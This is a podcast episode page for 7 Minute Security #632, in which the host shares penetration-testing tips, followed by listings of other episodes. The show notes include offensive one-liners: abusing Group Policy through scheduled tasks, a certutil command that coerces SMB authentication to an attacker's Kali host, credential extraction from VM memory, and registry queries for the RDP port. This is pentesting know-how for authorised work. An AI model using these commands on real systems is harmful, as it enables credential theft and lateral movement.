7MS #632: Tales of Pentest Pwnage – Part 59
7 Minute Security12 Heinä 2024

7MS #632: Tales of Pentest Pwnage – Part 59

Today's tale of pentest pwnage includes some fun stuff, including:

    • SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder.
    • I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
    • DonPAPI got an upgrade recently with a focus on evasion!
    • When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps.
    • Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`

And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

Jaksot(719)

7MS #607: How to Succeed in Business Without Really Crying - Part 15

7MS #607: How to Succeed in Business Without Really Crying - Part 15

Today we talk about some business-y things like: A pre first impressions opinion on Sysreptor Why I'm not worried about AI replacing manual pentesting (yet) My struggle with going "full CEO" vs....

19 Tammi 202439min

7MS #606: Hacking OWASP Juice Shop (2024 edition)

7MS #606: Hacking OWASP Juice Shop (2024 edition)

Today our pals Bjorn Kimminich from OWASP and Paul from Project7 and TheUnstoppables.ai join us as we kick off a series all about hacking the OWASP Juice Shop, which is "probably the most modern and s...

12 Tammi 202429min

7MS #605: Navigating the Demands of Tech Leadership with Amanda Berlin of Blumira

7MS #605: Navigating the Demands of Tech Leadership with Amanda Berlin of Blumira

Today our friend Amanda Berlin, Lead Incident Detection Engineer at Blumira, joins us to talk about being more mentally healthy in 2024! P.S. - did you miss Amanda's past visits to the program? Then c...

5 Tammi 202458min

7MS #604: A Two Tool Teaser

7MS #604: A Two Tool Teaser

Today we tease two upcoming tool releases (shooting for Q1, 2024): TCMLobbyBBQ - a Python script for PC players of The Texas Chain Saw Massacre game to help players get out of lobbies and into live ...

2 Tammi 202426min

7MS #603: Monitoring Your Tailscale Network with Uptime Kuma

7MS #603: Monitoring Your Tailscale Network with Uptime Kuma

Today I look at potentially replacing Splashtop and UptimeRobot (check out our episode about it here) with Tailscale and Uptime Kuma. The missing link (which I'd love some help with) is answering this...

24 Joulu 202328min

7MS #602: How to Succeed in Business Without Really Crying - Part 14

7MS #602: How to Succeed in Business Without Really Crying - Part 14

Today we're talkin' business! Specifically: How to (gently) say "no" to (some) client projects How to (politely) challenge end-of-year deadlines An idea I'm kicking around in the lab - where I might ...

15 Joulu 202344min

7MS #601: Breaking Up With Active Directory

7MS #601: Breaking Up With Active Directory

Today our pal Nate Schmitt (you may remember him from his excellent Dealing with Rejection: A DMARC Discussion Webinar) joins us to talk about breaking up with Active Directory. He covers: Why would...

11 Joulu 202327min

7MS #600: First Impressions of Using AI on Penetration Tests

7MS #600: First Impressions of Using AI on Penetration Tests

Hey friends, today I share my experience working with ChatGPT, Ollama.ai, PentestGPT and privateGPT to help me pentest Active Directory, as well as a machine called Pilgrimage from HackTheBox. Will AI...

1 Joulu 202322min

Suosittua kategoriassa Politiikka ja uutiset

uutiscast
aikalisa
politiikan-puskaradio
rss-ootsa-kuullut-tasta
ootsa-kuullut-tasta-2
tervo-halme
viisupodi
rss-podme-livebox
rss-vaalirankkurit-podcast
rss-asiastudio
aihe
rss-pinnalla
otetaan-yhdet
rss-girls-finish-f1rst
rss-ulkopoditiikkaa
the-ulkopolitist
et-sa-noin-voi-sanoo-esittaa
radio-antro
rss-mina-ukkola
rss-polikulaari-pitka-kiekko-ja-muut-ts-podcastit